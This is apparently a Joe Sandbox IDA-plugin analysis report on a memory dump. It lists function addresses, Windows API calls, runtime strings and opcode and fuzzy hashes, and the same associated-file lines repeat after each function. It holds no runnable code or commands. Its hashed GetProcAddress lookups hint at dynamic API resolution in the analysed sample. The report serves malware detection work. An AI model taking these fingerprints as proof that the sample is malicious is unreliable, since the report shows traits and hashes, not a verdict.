Strings

string too long, xrefs: 6CF10D5B, 6CF10DBA
invalid string position, xrefs: 6CF10D35

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 2168136238-4289949731
Opcode ID: ab4c5bda100ef0ae7f179500935e860c95ae3703f0924d46a2251528cf7c349f
Instruction ID: 73475d198cb6af11a9421ce00d8d3f6d85d0853a15f47bd2caba4997cd521562
Opcode Fuzzy Hash: ab4c5bda100ef0ae7f179500935e860c95ae3703f0924d46a2251528cf7c349f
Instruction Fuzzy Hash: 1D51D4323191849BD724CE1DD880A9FB7E6EBC5314B248A2EE855C7F84DBB1EC648791

Function 6CF31B20 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 154libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(User32.dll,?,00000000,?,?,?,?,?,?,?,?), ref: 6CF31C5E
LoadLibraryW.KERNEL32(User32.dll,?,00000000,?,?,?,?,?,?,?,?), ref: 6CF31C69
GetProcAddress.KERNEL32(00000000,F1F2E532), ref: 6CF31CA2
GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 6CF31CC1
LoadLibraryW.KERNEL32(kernel32.dll,?,00000000), ref: 6CF31CCC
GetProcAddress.KERNEL32(00000000,EFF3E52B), ref: 6CF31D0A

Strings

kernel32.dll, xrefs: 6CF31CBA, 6CF31CC7
User32.dll, xrefs: 6CF31C57, 6CF31C64

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID: User32.dll$kernel32.dll
API String ID: 310444273-1965990335
Opcode ID: 3a13bc953881fe8373aaa17de79ade3adc18f21efa000b9703cd0dcfb02cda38
Instruction ID: 230cb0e1d844de14adfc8ece54acceb813a83951d6470dc9daa3dca7da669360
Opcode Fuzzy Hash: 3a13bc953881fe8373aaa17de79ade3adc18f21efa000b9703cd0dcfb02cda38
Instruction Fuzzy Hash: 94616B74604A10AFD760CF18C591A6BBBF2FF46700F60DA58D49A8BF52D736E846CB80

Function 6CF74409 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

UnDecorator::getArgumentList.LIBCMT ref: 6CF7442E

Part of subcall function 6CF73FC9: Replicator::operator[].LIBCMT ref: 6CF7404C
Part of subcall function 6CF73FC9: DName::operator+=.LIBCMT ref: 6CF74054

DName::operator+.LIBCMT ref: 6CF74487
DName::DName.LIBCMT ref: 6CF744DF

Strings

void, xrefs: 6CF744D7
,..., xrefs: 6CF74473
..., xrefs: 6CF744C2
,<ellipsis>, xrefs: 6CF7447A, 6CF7447F
<ellipsis>, xrefs: 6CF744C9, 6CF744CE

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 834187326-2211150622
Opcode ID: ae390c8b5e6710e0d75e04aa16d7b5554571fbc495471db90a052073d221c106
Instruction ID: bf872fdbfefe81a5773556a8712c73e807c007d1175e33c47c4ed748e705a047
Opcode Fuzzy Hash: ae390c8b5e6710e0d75e04aa16d7b5554571fbc495471db90a052073d221c106
Instruction Fuzzy Hash: 9A2190B0611104EFCB51DF98E440AA97FF4AB46789B149196EC49CBB22CB31D943DF60

Function 6CF75D36 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMONLIBRARYCODE

Download Yara Rule

APIs

UnDecorator::UScore.LIBCMT ref: 6CF75D40
DName::DName.LIBCMT ref: 6CF75D4C

Part of subcall function 6CF73B3B: DName::doPchar.LIBCMT ref: 6CF73B6C

UnDecorator::getScopedName.LIBCMT ref: 6CF75D8B
DName::operator+=.LIBCMT ref: 6CF75D95
DName::operator+=.LIBCMT ref: 6CF75DA4
DName::operator+=.LIBCMT ref: 6CF75DB0
DName::operator+=.LIBCMT ref: 6CF75DBD

Strings

void, xrefs: 6CF75D9C

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
String ID: void
API String ID: 1480779885-3531332078
Opcode ID: 87beca35711d8926766ec6bb3f159a48e6ae6ebbbe693f4c507db1321fa5d055
Instruction ID: 6e8d70466b3207b4070fc2c90c428b9680ef7705fc240bfa7de81e2fb79da653
Opcode Fuzzy Hash: 87beca35711d8926766ec6bb3f159a48e6ae6ebbbe693f4c507db1321fa5d055
Instruction Fuzzy Hash: 7F1182B1905208BFDB19DF68E998FED7BB49F01305F00409AD4559BBA1DB709E4ACB60

Function 6CF2C850 Relevance: 13.8, APIs: 9, Instructions: 271COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CF2C88F
VariantInit.OLEAUT32(?), ref: 6CF2C895
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CF2C8A0
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CF2C8D5
VariantClear.OLEAUT32(?), ref: 6CF2C8E1
std::tr1::_Xweak.LIBCPMT ref: 6CF2CB1C
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2CB39
VariantClear.OLEAUT32(?), ref: 6CF2CB49
VariantClear.OLEAUT32(?), ref: 6CF2CB4F

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
String ID:
API String ID: 1774866819-0
Opcode ID: 21119177c688947f6a911ce5dc355d2f6d2b31766f27007b66c98645802c4bca
Instruction ID: 34545b5db7fc7ac67ae505074c784dc534c0a55edaf1baf58997a1a7ffedf609
Opcode Fuzzy Hash: 21119177c688947f6a911ce5dc355d2f6d2b31766f27007b66c98645802c4bca
Instruction Fuzzy Hash: ACB14975A006099FDB14DF98C884EEAB7F5BF8D300F15856CE506ABB91DA34F841CB60

Function 6CF23F10 Relevance: 13.7, APIs: 9, Instructions: 201COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF23F7B
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF23F8D
VariantInit.OLEAUT32(?), ref: 6CF23FB7
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CF23FD0
VariantClear.OLEAUT32(?), ref: 6CF240C9
VariantClear.OLEAUT32(?), ref: 6CF24105
SafeArrayDestroy.OLEAUT32(?), ref: 6CF24123
VariantClear.OLEAUT32(?), ref: 6CF24157
VariantClear.OLEAUT32(?), ref: 6CF24168

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Bound$DestroyElementInit
String ID:
API String ID: 758290628-0
Opcode ID: 353fe8c76e77fbcb5469884133b7482e27eba567857f8855567046f6c23f9ad9
Instruction ID: 5065de0ddbbc62cbde51f33f1c8530f5e6e5e1613028fb361de6891dd9f1ed8a
Opcode Fuzzy Hash: 353fe8c76e77fbcb5469884133b7482e27eba567857f8855567046f6c23f9ad9
Instruction Fuzzy Hash: 18719B722093819FC701DFA8C8C095BBBF8BB99304F154A2CF695C7650D779E949CB92

Function 6CF0FC30 Relevance: 13.7, APIs: 9, Instructions: 154fileCOMMON

Download Yara Rule

APIs

UnmapViewOfFile.KERNEL32(00000000,?,?,00000000,A64A5C11), ref: 6CF0FC98
CloseHandle.KERNEL32(FFFFFFFF,?,?,00000000,A64A5C11), ref: 6CF0FCAD
CloseHandle.KERNEL32(?,?,?,00000000,A64A5C11), ref: 6CF0FCB7
SetLastError.KERNEL32(00000000,?,?,00000000,A64A5C11), ref: 6CF0FCBA
CreateFileW.KERNEL32(?,-00000001,00000001,00000000,00000003,00000000,00000000,?,?,00000000,A64A5C11), ref: 6CF0FD01
GetFileSizeEx.KERNEL32(00000000,?,?,?,00000000,A64A5C11), ref: 6CF0FD14
GetLastError.KERNEL32(?,?,00000000,A64A5C11), ref: 6CF0FD2A
CreateFileMappingW.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,?,00000000,A64A5C11), ref: 6CF0FD6B
MapViewOfFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,?,00000000,A64A5C11), ref: 6CF0FD98

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: File$CloseCreateErrorHandleLastView$MappingSizeUnmap
String ID:
API String ID: 1303881157-0
Opcode ID: d9eac879eb29ea0590f9df0987da6d77559a4de811f7f18366d56950b5bbcdc7
Instruction ID: f56580fff3e7f291ef4b65e9fdc7aa138ee4503a080b9e9bc1b9eea5f879b5cb
Opcode Fuzzy Hash: d9eac879eb29ea0590f9df0987da6d77559a4de811f7f18366d56950b5bbcdc7
Instruction Fuzzy Hash: 9A5137B1B043019BDB408F34C8A5B573BB8AB49B64F248659EC14CF7C5D770D901DBA4

Function 6CF642B0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 186COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CF642DD

Part of subcall function 6CF690D8: std::exception::exception.LIBCMT ref: 6CF690ED
Part of subcall function 6CF690D8: __CxxThrowException@8.LIBCMT ref: 6CF69102
Part of subcall function 6CF690D8: std::exception::exception.LIBCMT ref: 6CF69113

_memmove.LIBCMT ref: 6CF64363
_memmove.LIBCMT ref: 6CF64381
_memmove.LIBCMT ref: 6CF643E6
_memmove.LIBCMT ref: 6CF64453
_memmove.LIBCMT ref: 6CF64474

Strings

vector<T> too long, xrefs: 6CF642D8

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: vector<T> too long
API String ID: 4034224661-3788999226
Opcode ID: f59bd71b00106f08395c7786c411696c1f6df32b14a817d862df5ea4bc5ea21c
Instruction ID: c8a2c3653710ea2ec3b2536e9c4a83218474c11d9e2738faacfec108e41820da
Opcode Fuzzy Hash: f59bd71b00106f08395c7786c411696c1f6df32b14a817d862df5ea4bc5ea21c
Instruction Fuzzy Hash: 885181B27043068FC718CF69DD9596BB7E5EBD4214F184E2DE886C3B44EA71E908C6A1

Function 6CF34B60 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 143COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CF34BC8
std::_Xinvalid_argument.LIBCPMT ref: 6CF34BE0
std::_Xinvalid_argument.LIBCPMT ref: 6CF34BFA
_memmove.LIBCMT ref: 6CF34C64
_memmove.LIBCMT ref: 6CF34C81

Strings

string too long, xrefs: 6CF34BDB, 6CF34BF5
invalid string position, xrefs: 6CF34BC3

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 2168136238-4289949731
Opcode ID: d9775654a473df0f4bb6780e8fc678cc464432c4f25bcb932f42def0d3ea5807
Instruction ID: 719b14416a44c47f5e1d65b07f0a7388727757434cff88d9440abd020034b216
Opcode Fuzzy Hash: d9775654a473df0f4bb6780e8fc678cc464432c4f25bcb932f42def0d3ea5807
Instruction Fuzzy Hash: AF419533305260ABD724CE1DE880A5EFFE9EBD5754B211A1EF059C7F90C7629C8587A1

Function 6CF1FFEA Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 130COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF223B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2240F

Strings

RSDi, xrefs: 6CF20075

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RSDi
API String ID: 4225690600-559181253
Opcode ID: 5496e35baf50e09f82e892662114172fd9e0322711d3f6373d63ee3c5d4c1dfd
Instruction ID: 6609c30d907321cda6542c1c2efc0388c74d476efc650e124dfc0bf52a812658
Opcode Fuzzy Hash: 5496e35baf50e09f82e892662114172fd9e0322711d3f6373d63ee3c5d4c1dfd
Instruction Fuzzy Hash: 8E416B74A016089FDB00CFA9C984E5EB7FAAF89304F20818AE509DB756DB76ED41CF50

Function 6CF20815 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF223B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2240F

Strings

RSUa, xrefs: 6CF20864

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RSUa
API String ID: 4225690600-2086061799
Opcode ID: 3dc487a15e879050e7fc32d96dc0b833a6c264355bd2fb9d1a31802617ad44ce
Instruction ID: 483d96bd323cc9b6d3500e3bb40a575449a188af2c19a3622bec46f615458b19
Opcode Fuzzy Hash: 3dc487a15e879050e7fc32d96dc0b833a6c264355bd2fb9d1a31802617ad44ce
Instruction Fuzzy Hash: 14312871E116189FDB00CFA9C984B9EB7B9AF89314F20858AE418E7651CB75EE81CF50

Function 6CF206F9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF223B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2240F

Strings

RSqb, xrefs: 6CF20748

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RSqb
API String ID: 4225690600-347567867
Opcode ID: da883116688e5964e85ab8cb08474539c577f30c4400fc99d36dba549b0cbb36
Instruction ID: 512033344df4410916495b3971ca12ba22b60df26f1d65392f0fa25dbdf22f91
Opcode Fuzzy Hash: da883116688e5964e85ab8cb08474539c577f30c4400fc99d36dba549b0cbb36
Instruction Fuzzy Hash: 8D314970A016089FCB00CFA9CD84B9EB7F9AF89314F20858AE418E7651DB79DE808F50

Function 6CF20787 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF223B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2240F

Strings

RSa, xrefs: 6CF207D6

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin
